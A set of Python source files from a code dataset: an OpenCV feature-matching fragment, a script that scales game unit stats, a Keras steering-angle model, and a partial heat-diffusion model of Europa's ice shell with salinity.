maxPooling(X,x,Y,y,img):\n return skimage.measure.block_reduce(img,(x,y),np.max)\n\ndef akaze_compare():\n img1 = cv.imread(path+'e1_rgb.png')\n img2 = cv.imread(path+'7.jpg')\n #gray\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n akaze = cv.AKAZE_create()\n kp1, des1 = akaze.detectAndCompute(gray1, None)\n kp2, des2 = akaze.detectAndCompute(gray2, None)\n\n bf = cv.BFMatcher(cv.NORM_HAMMING, crossCheck=True)\n matches = bf.match(des1, des2)\n matches = sorted(matches, key=lambda x: x.distance)\n img3 = cv.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=2)\n plt.imshow(cv.cvtColor(img3, cv.COLOR_BGR2RGB)), plt.show()\n \ndef monster_feature():\n #img = cv.imread(path+'7.jpg')\n img = cv.imread(path+'e1_rgb.png')\n #gray\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n \n blurred = cv.GaussianBlur(gray,(17,25),0)\n canny = cv.Canny(blurred, 30 ,150)\n #orb = cv.ORB_create()\n akaze = cv.AKAZE_create()\n kp, des = akaze.detectAndCompute(blurred, None)\n # draw only keypoints location,not size and orientation\n img2 = cv.drawKeypoints(blurred, kp, None, color=(0,255,0), flags=0)\n \n result = np.hstack([gray, blurred,
canny])\n plt.imshow(img2,cmap='gray'), plt.show()\n \n \n blurred = cv.GaussianBlur(gray, (15, 15), 0)\n canny = cv.Canny(blurred, 30, 150)\n\n\n result = np.hstack([gray, blurred, canny])\n plt.imshow(result,cmap='gray'), plt.show()\n\n '''\n akaze = cv.AKAZE_create()\n kp, des = akaze.detectAndCompute(gray, None)\n img2 = cv.drawKeypoints(img, kp, None, color=(0,255,0), flags=0)\n plt.imshow(cv.cvtColor(img2, cv.COLOR_BGR2RGB)), plt.show()\n '''\n\n#Capture()\n#img = cv.imread(path+'4.jpg')\n#ORB(img)\n#orb_compare()\n#akaze_compare()\nmonster_feature()\n'''\ngame = game_default()\ntempPicture = game.get_state().depth_buffer\ngame.init()\ngame.close()'''\n","sub_path":"mywork/objDetect.py","file_name":"objDetect.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303926625","text":"import gen_core\nimport json\nimport os\n\nunits = gen_core.units\n\ntools = gen_core.tools\n\nbase_directory = gen_core.base_directory\n\nfor i in units:\n with open(base_directory + i) as k:\n unit = json.load(k)\n if \"production\" in unit:\n if \"metal\" in unit[\"production\"]:\n unit[\"production\"][\"metal\"] = unit[\"production\"][\"metal\"] * 2\n if \"storage\" in unit:\n if \"metal\" in unit[\"storage\"]:\n unit[\"storage\"][\"metal\"] = unit[\"storage\"][\"metal\"] * 2\n\n if \"factory_cooldown_time\" in unit:\n unit[\"factory_cooldown_time\"] = unit[\"factory_cooldown_time\"] // 2\n\n if \"navigation\" in unit:\n if \"move_speed\" in unit[\"navigation\"]:\n unit[\"navigation\"][\"move_speed\"] = int(unit[\"navigation\"][\"move_speed\"] * 1.5)\n if \"acceleration\" in unit[\"navigation\"]:\n unit[\"navigation\"][\"acceleration\"] = int(unit[\"navigation\"][\"acceleration\"] * 1.5)\n if \"turn_speed\" in unit[\"navigation\"]:\n unit[\"navigation\"][\"turn_speed\"] = int(unit[\"navigation\"][\"turn_speed\"] * 1.5)\n\n\n if i[0:7] == '/pa_ex1':\n i = '/pa' + i[7:] \n\n try:\n with open('hypa' + i, 'w+') as out:\n c = 0\n except:\n os.makedirs(\"/\".join(('hypa' + i).split(\"/\")[:-1]))\n\n with open('hypa' + i, 'w+') as out:\n json.dump(unit, out)\n\nfor i in tools:\n with open(base_directory + i) as k:\n tool = json.load(k)\n\n if \"construction_demand\" in tool:\n if \"metal\" in tool[\"construction_demand\"]:\n tool[\"construction_demand\"][\"metal\"] = tool[\"construction_demand\"][\"metal\"] * 2\n\n if \"rate_of_fire\" in tool:\n tool[\"rate_of_fire\"] = tool[\"rate_of_fire\"] * 1.5\n if \"pitch_rate\" in tool:\n tool[\"pitch_rate\"] = tool[\"pitch_rate\"] * 1.5\n if \"yaw_rate\" in tool:\n tool[\"yaw_rate\"] = tool[\"yaw_rate\"] * 1.5\n\n if \"ammo_demand\" in tool:\n tool[\"ammo_demand\"] = tool[\"ammo_demand\"] * 1.5 \n\n\n if i[0:7] == '/pa_ex1':\n i = '/pa' + i[7:] \n\n try:\n with open('hypa' + i, 'w+') as out:\n c = 0\n except:\n os.makedirs(\"/\".join(('hypa' + i).split(\"/\")[:-1]))\n\n with open('hypa' + i, 'w+') as out:\n json.dump(tool, out)","sub_path":"gen_hypa.1.py","file_name":"gen_hypa.1.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"26546084","text":"import pandas as pd\nimport numpy as np\nfrom scipy.misc import imread\nfrom keras.layers import Flatten, Dense, Activation, Convolution2D, normalization\nfrom keras.models import Sequential\nimport matplotlib.pyplot as plt\nimport cv2\nfrom sklearn.model_selection import train_test_split\nfrom keras.optimizers import Adam\n\ndef 
extract_and_transform(df, col, pos):\n #Find and bring in the center picture from its residing folder\n im = imread(df[col][pos].strip())\n #Crop the image to get rid of the trees and landscape\n im = im[60:,:]\n #Resize the image\n im = cv2.resize(im, (200, 66))\n return im\n\ndef normalize(img_batch):\n #Normalize the extracted images to the range [-1, 1]\n norm = (np.array(img_batch)/127.5) - 1\n #Convert the image to a floating point number\n return norm.astype(np.float32)\n\ndef load_bottleneck_data(driving_log):\n file = driving_log #driving_log.csv\n #Name all the columns in the dataframe\n cols = ['Center_Image','Left_Image','Right_Image','Steering_Angle','Throttle','Break','Speed']\n df = pd.read_csv(file, names = cols)\n \n #Store all the center images\n X = []\n for i in range(len(df)):\n transformed = extract_and_transform(df, cols[0], i)\n X.append(transformed)\n \n X = normalize(X)\n #Convert the steering angles to a list and set them to y\n y = df[cols[3]].tolist()\n \n #Split the data into testing and training data\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=0)\n\n return X_train, X_test, y_train, y_test\n\n\n# load bottleneck data\nX_train, X_test, y_train, y_test = load_bottleneck_data('C:/Users/asyed/Downloads/driving_log.csv')\n\n#Reshape all the data for the model architecture\nX_train = np.reshape(X_train, (len(X_train), 66, 200, 3))\nX_test = np.reshape(X_test, (len(X_test), 66, 200, 3))\ny_train = np.reshape(y_train, (len(y_train), 1))\ny_test = np.reshape(y_test, (len(y_test), 1))\n\ninput_shape = X_train.shape[1:]\n#the output is a steering angle (i.e. 1 class)\nnb_classes = 1\n\n\nmodel = Sequential()\n#the first layer of the model must declare the input shape\nmodel.add(normalization.BatchNormalization(input_shape=input_shape))\nmodel.add(Convolution2D(24, 5, 5, subsample=(2,2), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=(2,2), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=(2,2), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, subsample=(1,1), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, subsample=(1,1), border_mode='valid', activation='relu'))\nmodel.add(Flatten())\n\n#model.add(Dropout(0.25))\nmodel.add(Dense(1164))\nmodel.add(Activation('relu'))\nmodel.add(Dense(100))\nmodel.add(Activation('relu'))\nmodel.add(Dense(50))\nmodel.add(Activation('relu'))\nmodel.add(Dense(10))\nmodel.add(Activation('relu'))\n#model.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.summary()\nmodel.compile(loss='mse', optimizer=Adam(), metrics=['mean_squared_error'])\n#model.fit expects in-memory arrays; fit_generator would require a Python generator\nhistory = model.fit(X_train, y_train,\n nb_epoch=3,\n batch_size=10,\n validation_data=(X_test, y_test),\n shuffle=True,\n verbose=1) \n#Output the JSON and H5 file for trying in the driving program provided\nmodel_json = model.to_json()\nwith open(\"C:/Users/asyed/Downloads/model.json\", \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(\"C:/Users/asyed/Downloads/model.h5\")\nprint(\"Saved model to disk\")","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"132954785","text":"# Author: Chase Chivers\n# Last updated: 10/28/19\n# Modular build for 2d heat diffusion problem\n# applied to liquid water in the ice
shell of Europa\n\nimport numpy as np\nfrom scipy import optimize\nfrom HeatSolver import HeatSolver\n\nclass IceSystem(HeatSolver):\n\t\"\"\"\n\tClass with methods to set up initial conditions for a two-dimensional, two-phase thermal diffusion model that\n\tincludes temperature-dependent conductivity and salinity. Includes the HeatSolver class used to solve the heat\n\tequation utilizing an enthalpy method (Huber et al., 2008) to account for latent heat from phase change as well\n\tas a parameterization for a saline system.\n\t\"\"\"\n\tdef __init__(self, Lx, Lz, dx, dz, kT=True, cpT=False, use_X_symmetry=False):\n\t\t\"\"\"\n\t\tInitialize the system.\n\t\tParameters:\n\t\t\tLx : float\n\t\t\t\tlength of horizontal spatial domain, m\n\t\t\tLz : float\n\t\t\t\tthickness of shell, length of vertical spatial domain, m\n\t\t\tdx : float\n\t\t\t\thorizontal spatial step size, m\n\t\t\tdz : float\n\t\t\t\tvertical spatial step size, m\n\t\t\tcpT : bool, str\n\t\t\t   choose whether to use temperature-dependent specific heat;\n\t\t\t   default = False, i.e. constant cp_i.\n\t\t\t   'GM89': cp_i ~ 185 + 7.037*T (Grimm & McSween, 1989)\n\t\t\t   'CG10': cp_i ~ 74.11 + 7.56*T (Choukroun & Grasset, 2010)\n\t\t\tkT : bool\n\t\t\t   choose whether to use temperature-dependent thermal conductivity,\n\t\t\t   default = True, temperature-dependent, k=ac/T (Petrenko, Klinger, etc.)\n\t\t\tuse_X_symmetry : bool\n\t\t\t\tassume the system is symmetric about the center of the intrusion\n\t\t\t\t* NOTE: Must use Reflecting boundary condition for sides if using this\n\t\t\tissalt : bool\n\t\t\t\tdeclare whether salinity will be used in this system, necessary for declaring fit functions and\n\t\t\t\tmelting temperature calculations\n\t\tUsage:\n\t\t\tIce shell is 40 km thick and 40 km wide at a spatial discretization of 50 m:\n\t\t\t\tmodel = IceSystem(40e3, 40e3, 50, 50)\n\n\t\t\tSee README\n\t\t\"\"\"\n\n\t\tself.Lx, self.Lz = Lx, Lz\n\t\tself.dx, self.dz = dx, dz\n\t\tself.nx, self.nz = int(Lx / dx + 1), int(Lz / dz + 1)\n\t\tself.Z = np.array([j * dz for j in range(self.nz)], dtype=float) # positive down\n\t\tif use_X_symmetry:\n\t\t\tself.symmetric = True\n\t\t\tself.Lx = self.Lx / 2\n\t\t\tself.nx = int(self.Lx / self.dx + 1)\n\t\t\tself.X = np.array([i * dx for i in range(self.nx)], dtype=float)\n\t\t\tself.X, self.Z = np.meshgrid(self.X, self.Z) # create spatial grid\n\t\telif use_X_symmetry is False:\n\t\t\tself.X = np.array([-Lx / 2 + i * dx for i in range(self.nx)], dtype=float) # x domain centered on 0\n\t\t\tself.X, self.Z = np.meshgrid(self.X, self.Z) # create spatial grid; np.meshgrid takes no dtype argument\n\t\tself.T = np.zeros((self.nz, self.nx), dtype=float) # initialize domain at one temperature\n\t\tself.S = np.zeros((self.nz, self.nx), dtype=float) # initialize domain with no salt\n\t\tself.phi = np.zeros((self.nz, self.nx), dtype=float) # initialize domain as ice\n\t\tself.kT, self.cpT = kT, cpT # k(T), cp_i(T) I/O\n\t\tself.issalt = False # salt I/O\n\n\tclass constants:\n\t\t\"\"\"\n\t\tNo-methods class used for defining constants in a simulation. May be changed inside here or as an\n\t\tinstance during simulation runs.\n\t\t\"\"\"\n\t\tstyr = 3.154e7 # s/yr, seconds in a year\n\n\t\tg = 1.32 # m/s2, Europa surface gravity\n\n\t\t# Thermal properties\n\t\trho_i = 917. # kg/m3, pure ice density\n\t\trho_w = 1000.
# kg/m3, pure water density\n\t\tcp_i = 2.11e3 # J/kgK, pure ice specific heat\n\t\tcp_w = 4.19e3 # J/kgK, pure water specific heat\n\t\tki = 2.3 # W/mK, pure ice thermal conductivity\n\t\tkw = 0.56 # W/mK, pure water thermal conductivity\n\t\tac = 567 # W/m, ice thermal conductivity constant, ki = ac/T (Klinger, 1980)\n\t\tTm = 273.15 # K, pure ice melting temperature at 1 atm\n\t\tLf = 333.6e3 # J/kg, latent heat of fusion of ice\n\t\texpans = 1.6e-4 # 1/K, thermal expansivity of ice\n\n\t\trho_s = 0. # kg/m3, salt density, assigned only when salinity is used\n\n\t\t# Radiation properties\n\t\temiss = 0.97 # pure ice emissivity\n\t\tstfblt = 5.67e-8 # W/m2K4, Stefan-Boltzmann constant\n\n\t\t# Constants for viscosity dependent tidal heating\n\t\t# from Mitri & Showman (2005)\n\t\tact_nrg = 26. # activation energy for diffusive regime\n\t\tQs = 60e3 # J/mol, activation energy of ice (Goldsby & Kohlstedt, 2001)\n\t\tRg = 8.3144598 # J/K*mol, gas constant\n\t\teps0 = 1e-5 # maximum tidal flexing strain\n\t\tomega = 2.5e-5 # 1/s, tidal flexing frequency\n\t\tvisc0i = 1e13 # Pa s, minimum reference ice viscosity at T=Tm\n\t\tvisc0w = 1.3e-3 # Pa s, dynamic viscosity of water near the melting point\n\n\t\t# Mechanical properties of ice\n\t\tG = 3.52e9 # Pa, shear modulus/rigidity (Moore & Schubert, 2000)\n\t\tE = 2.66 * G # Pa, Young's Modulus\n\n\tdef save_initials(self):\n\t\t\"\"\" Save initial values to compare with simulation results. \"\"\"\n\t\tself.T_initial = self.T.copy()\n\t\tself.Tm_initial = self.Tm.copy()\n\t\tself.phi_initial = self.phi.copy()\n\t\tself.S_initial = self.S.copy()\n\n\t\tif self.kT:\n\t\t\tself.k_initial = self.phi_initial * self.constants.kw + (1 - self.phi_initial) * \\\n\t\t\t self.constants.ac / self.T_initial\n\t\telse:\n\t\t\tself.k_initial = self.phi_initial * self.constants.kw + (1 - self.phi_initial) * self.constants.ki\n\n\tdef init_volume_averages(self):\n\t\t\"\"\"\n\t\tInitialize volume-averaged values over the domain. In practice, this is automatically called by any\n\t\tfunction that changes physical parameters such as liquid fraction, salinity or temperature.\n\t\t\"\"\"\n\t\tif self.kT:\n\t\t\tself.k = (1 - self.phi) * (self.constants.ac / self.T) + self.phi * self.constants.kw\n\t\telse:\n\t\t\tself.k = (1 - self.phi) * self.constants.ki + self.phi * self.constants.kw\n\n\t\tif self.cpT == \"GM89\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Grimm & McSween 1989\"\n\t\t\tself.cp_i = 185.
+ 7.037 * self.T\n\t\telif self.cpT == \"CG10\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Choukroun & Grasset 2010\"\n\t\t\tself.cp_i = 74.11 + 7.56 * self.T\n\t\telse:\n\t\t\tself.cp_i = self.constants.cp_i\n\n\t\t# this is very unimportant overall\n\t\tif self.issalt:\n\t\t\tself.rhoc = (1 - self.phi) * (self.constants.rho_i + self.Ci_rho * self.S) * self.cp_i \\\n\t\t\t + self.phi * (self.constants.rho_w + self.C_rho * self.S) * self.constants.cp_w\n\n\t\telse:\n\t\t\tself.rhoc = (1 - self.phi) * self.constants.rho_i * self.cp_i \\\n\t\t\t + self.phi * self.constants.rho_w * self.constants.cp_w\n\n\t\tself.save_initials()\n\n\tdef init_T(self, Tsurf, Tbot, profile='non-linear', real_Lz=0):\n\t\t\"\"\"\n\t\tInitialize temperature profile\n\t\t\tParameters:\n\t\t\t\tTsurf : float\n\t\t\t\t\tsurface temperature\n\t\t\t\tTbot : float\n\t\t\t\t\ttemperature at bottom of domain\n\t\t\t\tprofile : string\n\t\t\t\t\t-> defaults to 'non-linear'\n\t\t\t\t\tprescribed temperature profile\n\t\t\t\t\t'non-linear' -- expected equilibrium thermal gradient with k(T)\n\t\t\t\t\t'linear' -- equilibrium thermal gradient for constant k\n\t\t\t\t\t'stefan' -- sets up the freezing stefan problem temperature profile\n\t\t\t\t\t\t\t\t\tin this instance, Tbot should be the melting temperature\n\t\t\t\treal_Lz : float\n\t\t\t\t\tused to simulate some portion of a much larger shell: the temperature profile is made to be\n\t\t\t\t\tthat of the much larger shell rather than of the domain being simulated.\n\t\t\t\t\tFor example, a 40 km conductive shell (real_Lz = 40e3) discretized at 10 m can be computationally\n\t\t\t\t\texpensive. However, if we assume that any temperature anomaly at shallow depths (~1-5 km) won't\n\t\t\t\t\treach 40 km within the model time, we can reduce the computational domain to ~5 km to speed up\n\t\t\t\t\tthe simulation. This treats Tbot as the bottom temperature of the full 40 km shell and assigns\n\t\t\t\t\tthe model's bottom boundary the temperature at 5 km depth, accounting for the reduced domain\n\t\t\t\t\tsize. See the usage example below.\n\t\t\tReturns:\n\t\t\t\tT : (nz,nx) grid\n\t\t\t\t\tgrid of temperature values\n\n\t\t\tUsage :\n\t\t\t\tDefault usage:\n\t\t\t\t\tmodel.init_T(Tsurf=75, Tbot=273.15)\n\n\t\t\t\tLinear profile:\n\t\t\t\t\tmodel.init_T(Tsurf = 50, Tbot = 273.15, profile='linear')\n\n\t\t\t\tCheated domain:\n\t\t\t\t\trealLz = 50e3\n\t\t\t\t\tmodelLz = 5e3\n\t\t\t\t\tmodel = IceSystem(Lz=modelLz, ...)\n\t\t\t\t\tmodel.init_T(Tsurf=110, Tbot=273.15, real_Lz=realLz)\n\t\t\"\"\"
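\t\t# Worked example for the 'cheated domain' above (added comment, not in the original):\n\t\t# the bottom temperature is rescaled as Tbot_model = Tsurf*(Tbot/Tsurf)**(Lz/real_Lz),\n\t\t# so for Tsurf=110, Tbot=273.15, Lz=5e3, real_Lz=40e3 it becomes 110*(273.15/110)**0.125 ~ 123 K.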
\t\t# set melting temperature to default\n\t\tself.Tm = self.constants.Tm * np.ones(self.X.shape)\n\n\t\tif isinstance(profile, str):\n\t\t\tif profile == 'non-linear':\n\t\t\t\tif real_Lz > 0:\n\t\t\t\t\tTbot = Tsurf * (Tbot / Tsurf) ** (self.Lz / real_Lz)\n\t\t\t\tself.T = Tsurf * (Tbot / Tsurf) ** (abs(self.Z / self.Lz))\n\n\t\t\telif profile == 'linear':\n\t\t\t\tif real_Lz > 0:\n\t\t\t\t\tTbot = (Tbot - Tsurf) * (self.Lz / real_Lz) + Tsurf\n\t\t\t\tself.T = (Tbot - Tsurf) * abs(self.Z / self.Lz) + Tsurf\n\n\t\t\telif profile == 'stefan':\n\t\t\t\tself.T[0, :] = Tsurf # set the very top of grid to surface temperature\n\t\t\t\tself.T[1:, :] = Tbot # everything below is at the melting temperature\n\t\t\t\tself.phi[1:, :] = 1 # everything starts as liquid\n\t\t\t\tprofile += ' plus domain all water'\n\n\t\t\tprint('init_T(Tsurf = {}, Tbot = {})'.format(Tsurf, Tbot))\n\t\t\tprint('\\t Temperature profile initialized to {}'.format(profile))\n\n\t\telse:\n\t\t\tself.T = profile\n\t\t\tprint('init_T: custom profile implemented')\n\n\t\t# save boundaries for dirichlet or other\n\t\t# left and right boundaries\n\t\tself.TtopBC = self.T[0, :]\n\t\tself.TbotBC = self.T[-1, :]\n\t\tself.Tedge = self.T[:, 0] = self.T[:, -1]\n\t\tself.Tsurf = Tsurf\n\t\tself.Tbot = Tbot\n\t\tself.init_volume_averages()\n\n\tdef set_intrusion_geom(self, depth, thickness, radius, geometry='ellipse'):\n\t\t\"\"\"\n\t\tSets geometry of intrusion. In practice, it is automatically called by init_intrusion() and generally does\n\t\tnot need to be called in a simulation script.
Creates tuple IceSystem.geom that holds the initial intrusion grid indices for\n\t\tmanipulation inside simulation and outside for more customization.\n\t\t\"\"\"\n\n\t\tif isinstance(geometry, str):\n\t\t\tif geometry == 'ellipse':\n\t\t\t\tcenter = thickness / 2 + depth\n\t\t\t\ttry:\n\t\t\t\t\tif self.symmetric: # adjust geometry to make sure the center of the intrusion isn't on the boundary\n\t\t\t\t\t\t_R_ = self.X - self.dx\n\t\t\t\t\t\tthickness += self.dz\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t_R_ = self.X\n\t\t\t\tself.geom = np.where((_R_ / radius) ** 2 + (self.Z - center) ** 2 / ((thickness / 2) ** 2) <= 1)\n\t\t\t# del center, _R_\n\t\t\telif geometry == 'box':\n\t\t\t\ttry:\n\t\t\t\t\tif self.symmetric: # adjust geometry to make sure the center of the intrusion isn't on the boundary\n\t\t\t\t\t\tradius += self.dx\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tradius = radius\n\t\t\t\tr = np.where(abs(self.X[0, :]) <= radius)[0]\n\t\t\t\tz = np.intersect1d(np.where(self.Z[:, 0] <= thickness + depth), np.where(self.Z[:, 0] >= depth))\n\t\t\t\ttmp = np.zeros(self.T.shape)\n\t\t\t\ttmp[z.min():z.max(), r.min():r.max() + 1] = 1\n\t\t\t\tself.geom = np.where(tmp == 1)\n\t\t# del tmp, r, z\n\n\t\t# option for a custom geometry\n\t\telse:\n\t\t\tself.geom = geometry\n\n\tdef init_intrusion(self, T, depth, thickness, radius, phi=1, geometry='ellipse'):\n\t\t\"\"\"\n\t\tInitialize intrusion properties. Updates volume averages after initialization: means we can just initialize\n\t\ttemperature and intrusion to get all thermal properties set.\n\t\t**So far this only accounts for a single intrusion at the center of the domain\n\t\t\tshould be simple to add multiples in the future if necessary\n\n\t\tParameters:\n\t\t\tT : float\n\t\t\t\tset intrusion to single Temperature value, assuming that it is well mixed\n\t\t\tdepth : float\n\t\t\t\tset depth of upper edge of the intrusion, m\n\t\t\tthickness : float\n\t\t\t\tset thickness of intrusion, m\n\t\t\tradius : float\n\t\t\t\tset radius of intrusion, m\n\t\t\tphi : float [0,1]\n\t\t\t\tset liquid fraction of intrusion, generally interested in totally liquid bodies so default = 1\n\t\t\tgeometry : string (see set_intrusion_geom()), array\n\t\t\t\tset geometry of intrusion, default is an ellipse\n\n\t\tUsage:\n\t\t\tIntrusion at pure water melting temperature (273.15 K), emplaced at 2 km depth in the shell, 2 km thick\n\t\t\tand a radius of 4 km:\n\t\t\t\tmodel.init_intrusion(T=273.15, depth=2e3, thickness=2e3, radius=4e3)\n\t\t\"\"\"\n\n\t\tif phi < 0 or phi > 1:\n\t\t\traise Exception('liquid fraction must be between 0 and 1')\n\n\t\t# save intrusion properties\n\t\tself.T_int = T\n\t\tself.depth, self.thickness, self.R_int = depth, thickness, radius\n\t\tself.set_intrusion_geom(depth, thickness, radius, geometry) # get chosen geometry\n\t\tself.T[self.geom] = T # set intrusion temperature to chosen temperature\n\t\tself.phi[self.geom] = phi # set intrusion to chosen liquid fraction\n\t\tself.init_volume_averages() # update volume averages\n\n\t# define a bunch of useful functions for salty systems, unused otherwise\n\t# non-linear fit, for larger dT\n\tdef shallow_fit(self, dT, a, b, c, d):\n\t\treturn a + b * (dT + c) * (1 - np.exp(-d / dT)) / (1 + dT)\n\n\t# linear fit, for small dT\n\tdef linear_fit(self, dT, a, b):\n\t\treturn a + b * dT\n\n\t# FREEZCHEM quadratic fit for liquidus curve\n\tdef Tm_func(self, S, a, b, c):\n\t\treturn a * S ** 2 + b * S + c\n\n\tdef init_salinity(self, S=None, composition='MgSO4', concentration=12.3, 
rejection_cutoff=0.25, shell=False,\n\t in_situ=False, T_match=True):\n\t\t\"\"\"\n\t\tInitialize salinity properties for simulations.\n\t\tParameters:\n\t\t\tS : (nz,nx) grid\n\t\t\t\tNecessary for a custom background salinity or other configurations, e.g. a super saline layer\n\t\t\t\t-> though this could also be set up outside of this method\n\t\t\tcomposition : string\n\t\t\t\tChoose which composition the liquid should be.\n\t\t\t\tOptions: 'MgSO4', 'NaCl'\n\t\t\tconcentration : float\n\t\t\t\tInitial intrusion concentration and/or ocean concentration; if using the shell option (below),\n\t\t\t\tthis assumes that the shell was frozen out of an ocean with this concentration and composition\n\t\t\trejection_cutoff : float > 0\n\t\t\t\tLiquid fraction (phi) below which no more salt will be accepted into the remaining liquid or\n\t\t\t\tinterstitial liquid. Note: should be greater than 0\n\t\t\tshell : bool\n\t\t\t\tOption to include background salinity in the shell given the chosen composition and concentration.\n\t\t\t\tThis will automatically adjust the temperature profile to account for a salty ocean near the melting\n\t\t\t\ttemperature. If assuming something else, such as a slightly cooler convecting layer between the\n\t\t\t\tbrittle shell and the ocean, this can be adjusted afterward by calling init_T()\n\t\t\tin_situ : bool\n\t\t\t\tAssumes the intrusion is from an event that melted the shell in-situ and thus has the same\n\t\t\t\tconcentration and composition as the shell at that depth.\n\t\t\tT_match : bool\n\t\t\t\tOption to adjust the temperature profile so that the bottom boundary is at the melting temperature\n\t\t\t\tof an ocean with the same composition and concentration. This is mostly used if making the\n\t\t\t\tassumption that the brittle layer simulated here is directly above the ocean.\n\n\t\tUsage:\n\t\t\tPure shell, saline intrusion: Intrusion with 34 ppt NaCl salinity\n\t\t\t\tmodel.init_salinity(composition='NaCl', concentration=34.)\n\n\t\t\tSaline shell, in-situ melting: Ocean began with 100 ppt MgSO4 and intrusion has been created by in-situ\n\t\t\tmelting\n\t\t\t\tmodel.init_salinity(composition='MgSO4', concentration=100., shell=True, in_situ=True)\n\t\t\"\"\"\n\t\tif in_situ:\n\t\t\tshell = True\n\n\t\tself.issalt = True # turn on salinity for solvers\n\t\tself.saturated = 0 # whether liquid is saturated\n\t\tself.rejection_cutoff = rejection_cutoff # minimum liquid fraction of cell to accept rejected salt\n\n\t\t# composition and concentration coefficients for fits from Buffo et al. (2019)\n\t\t# others have been calculated by additional runs using the model from Buffo et al. (2019)\n\n\t\t# dict structure {composition: [a,b,c]}\n\t\t# Liquidus curves derived from Liquius 1.0 (Buffo et al.
2019 and FREEZCHEM) for MgSO4 and NaCl\n\t\tself.Tm_consts = {'MgSO4': [-1.333489497e-5, -0.01612951864, 273.055175687],\n\t\t 'NaCl': [-9.1969758e-5, -0.03942059, 272.63617665]\n\t\t }\n\n\t\t# dict structure {composition: {concentration: [a,b,c,d]}}\n\t\tself.shallow_consts = {'MgSO4': {0: [0., 0., 0., 0.],\n\t\t 12.3: [12.21, -8.3, 1.836, 20.2],\n\t\t 100: [22.19, -11.98, 1.942, 21.91],\n\t\t 282: [30.998, -11.5209, 2.0136, 21.1628]},\n\t\t 'NaCl': {0: [0., 0., 0., 0.],\n\t\t 10: [7.662, -4.936, 2.106, 24.8],\n\t\t 34: [11.1, -4.242, 1.91, 22.55],\n\t\t 100: [0., 0., 0., 0.],\n\t\t 260: [0., 0., 0., 0.]}\n\t\t }\n\n\t\t# dict structure {composition: {concentration: [a,b]}}\n\t\tself.linear_consts = {'MgSO4': {0: [0., 0.],\n\t\t 12.3: [1.0375, 0.40205],\n\t\t 100: [5.4145, 0.69992],\n\t\t 282: [14.737, 0.62319]},\n\t\t 'NaCl': {0: [0., 0.],\n\t\t 10: [0.6442, 0.2279],\n\t\t 34: [1.9231, 0.33668],\n\t\t 100: [0., 0.],\n\t\t 260: [0., 0.]}\n\t\t }\n\n\t\t# dict structure {composition: {concentration: [a,b,c]}}\n\t\tself.depth_consts = {'MgSO4': {12.3: [1.0271, -74.0332, -4.2241],\n\t\t 100: [5.38, -135.096, -8.2515],\n\t\t 282: [14.681, -117.429, -5.4962]},\n\t\t 'NaCl': {10: [0., 0., 0.],\n\t\t 34: [1.8523, -72.4049, -10.6679],\n\t\t 100: [0., 0., 0.],\n\t\t 260: [0., 0., 0.]}\n\t\t }\n\n\t\t# create dictionary of root to switch between shallow and linear fits\n\t\t# dict structure {chosen composition: {concentration: root}}\n\t\tself.linear_shallow_roots = {composition: {}}\n\t\tfor key in self.linear_consts[composition]:\n\t\t\tself.linear_shallow_roots[composition][key] = optimize.root(lambda x:\n\t\t\t self.shallow_fit(x, *\n\t\t\t self.shallow_consts[composition][key]) \\\n\t\t\t - self.linear_fit(x, *\n\t\t\t self.linear_consts[composition][key]), 3)['x'][\n\t\t\t\t0]\n\n\t\tself.composition = composition\n\t\tself.concentration = concentration\n\n\t\tif self.composition == 'MgSO4':\n\t\t\t# Liquidus curve derived from Liquius 1.0 (Buffo et al. 2019 and FREEZCHEM) for MgSO4\n\t\t\t# changing from lambda notation to def notation for better pickling?\n\n\t\t\t# def self.Tm_func = lambda S: (-(1.333489497 * 1e-5) * S ** 2) - 0.01612951864 * S + 273.055175687\n\t\t\t# density changes for water w/ concentration of salt below\n\t\t\tself.C_rho = 1.145\n\t\t\tself.Ci_rho = 7.02441855e-01\n\n\t\t\tself.saturation_point = 282. # ppt, saturation concentration of MgSO4 in water\n\t\t\tself.constants.rho_s = 2660. # kg/m^3, density of MgSO4\n\n\t\telif self.composition == 'NaCl':\n\t\t\t# Liquidus curve derived from Liquius 1.0 (Buffo et al. 2019 and FREEZCHEM) for NaCl\n\t\t\t# linear fit for density change due to salinity S\n\t\t\tself.C_rho = 0.8644\n\t\t\tself.Ci_rho = 6.94487270e-01\n\n\t\t\tself.saturation_point = 260. # ppt, saturation concentration of NaCl in water\n\t\t\tself.constants.rho_s = 2160. # kg/m^3, density of NaCl\n\n\t\t# save array of concentrations for chosen composition for entraining salt in ice\n\t\tself.concentrations = np.sort([key for key in self.shallow_consts[composition]])\n\n\t\tif S is not None:\n\t\t\t# method for custom salinity + brine inclusion\n\t\t\tself.S = S\n\t\t\tself.S += self.phi * concentration\n\n\t\tif shell:\n\t\t\t# method for a salinity/depth profile via Buffo et al. 
